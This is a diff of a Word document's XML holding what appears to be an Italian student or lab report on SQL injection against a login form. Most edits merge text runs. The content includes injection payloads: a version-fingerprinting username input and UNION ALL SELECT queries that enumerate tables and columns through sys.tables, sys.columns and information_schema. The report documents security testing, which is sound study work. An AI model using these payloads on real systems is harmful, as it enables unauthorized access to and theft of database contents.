--- a/Sicurezza.docx
+++ b/Sicurezza.docx
@@ -705,25 +705,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Il primo passo nella raccolta delle informazioni è stato scoprire </w:t>
-      </w:r>
-      <w:r>
-        <w:t>la tipologia di database</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Abbiamo</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> sfruttato </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ancora </w:t>
+        <w:t xml:space="preserve">Il primo passo nella raccolta delle informazioni è stato scoprire la tipologia di database. Abbiamo sfruttato ancora </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -731,13 +713,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> di login iniettando un comando caratteristico del database che </w:t>
-      </w:r>
-      <w:r>
-        <w:t>volevamo</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> testare.</w:t>
+        <w:t xml:space="preserve"> di login iniettando un comando caratteristico del database che volevamo testare.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -822,23 +798,7 @@
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>(null,</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>1)=</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>1--",</w:t>
+              <w:t>(null,1)=1--",</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -921,23 +881,7 @@
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve">  "username": "' or </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>version(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>)&lt;&gt;''--",</w:t>
+              <w:t xml:space="preserve">  "username": "' or version()&lt;&gt;''--",</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1075,15 +1019,7 @@
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Informazioni sulla struttura del database tramite </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>piggybacked</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> query</w:t>
+        <w:t>Informazioni sulla struttura del database</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1129,7 +1065,7 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>Questa</w:t>
+        <w:t>Quest</w:t>
       </w:r>
       <w:r>
         <w:t>’a</w:t>
@@ -1139,15 +1075,13 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> però può essere sfruttata per tornare dati sulla struttura del database tramite </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>piggybacked</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> query.</w:t>
+        <w:t xml:space="preserve"> però può essere sfruttata per </w:t>
+      </w:r>
+      <w:r>
+        <w:t>ricavare</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> la struttura del database tramite.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1255,7 +1189,6 @@
               <w:t xml:space="preserve">FROM </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -1264,7 +1197,6 @@
               <w:t>sys.tables</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -1289,7 +1221,6 @@
               <w:t xml:space="preserve">JOIN </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -1298,7 +1229,6 @@
               <w:t>sys.schemas</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -1307,21 +1237,12 @@
               <w:t xml:space="preserve"> s ON </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>t.schema</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>_id</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>t.schema_id</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
@@ -1332,21 +1253,12 @@
               <w:t xml:space="preserve"> = </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>s.schema</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>_id</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>s.schema_id</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
           </w:p>
@@ -1453,18 +1365,9 @@
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>information_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>schema.tables</w:t>
+              <w:t>information_schema.tables</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -1855,7 +1758,6 @@
               <w:t xml:space="preserve">FROM </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -1864,7 +1766,6 @@
               <w:t>sys.tables</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -1889,7 +1790,6 @@
               <w:t xml:space="preserve">JOIN </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -1898,7 +1798,6 @@
               <w:t>sys.schemas</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -1907,21 +1806,12 @@
               <w:t xml:space="preserve"> s ON </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>t.schema</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>_id</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>t.schema_id</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
@@ -1932,21 +1822,12 @@
               <w:t xml:space="preserve"> = </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>s.schema</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>_id</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>s.schema_id</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
@@ -2035,18 +1916,9 @@
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>information_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>schema.tables</w:t>
+              <w:t>information_schema.tables</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -2063,21 +1935,12 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>WHERE</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">WHERE </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2716,37 +2579,37 @@
               <w:jc w:val="left"/>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    Convert(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>varchar(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">10), </w:t>
+                <w:lang w:val="fr-FR"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
+                <w:lang w:val="fr-FR"/>
+              </w:rPr>
+              <w:t>Convert</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="fr-FR"/>
+              </w:rPr>
+              <w:t xml:space="preserve">(varchar(10), </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="fr-FR"/>
               </w:rPr>
               <w:t>c.max_length</w:t>
             </w:r>
@@ -2754,7 +2617,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
+                <w:lang w:val="fr-FR"/>
               </w:rPr>
               <w:t>) + '-' +</w:t>
             </w:r>
@@ -2770,7 +2633,7 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
+                <w:lang w:val="fr-FR"/>
               </w:rPr>
               <w:t xml:space="preserve">    </w:t>
             </w:r>
@@ -2788,39 +2651,55 @@
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="fr-FR"/>
               </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
+              <w:t xml:space="preserve">(varchar(10), </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="fr-FR"/>
               </w:rPr>
-              <w:t>varchar(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t>c.is_nullable</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="fr-FR"/>
               </w:rPr>
-              <w:t xml:space="preserve">10), </w:t>
+              <w:t xml:space="preserve">) </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">FROM </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="fr-FR"/>
-              </w:rPr>
-              <w:t>c.is_nullable</w:t>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>sys.columns</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="fr-FR"/>
-              </w:rPr>
-              <w:t xml:space="preserve">) </w:t>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> c </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2836,25 +2715,448 @@
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t xml:space="preserve">JOIN </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>sys.tables</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> t ON </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>c.object_id</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>t.object_id</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">JOIN </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>sys.schemas</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> s ON </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>t.schema_id</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>s.schema_id</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">JOIN </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>sys.types</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> ty ON </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>c.user_type_id</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>ty.user_type_id</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>--</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>###PostgreSQL</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>' UNION ALL</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">SELECT </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    NULL, NULL, NULL, NULL, </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
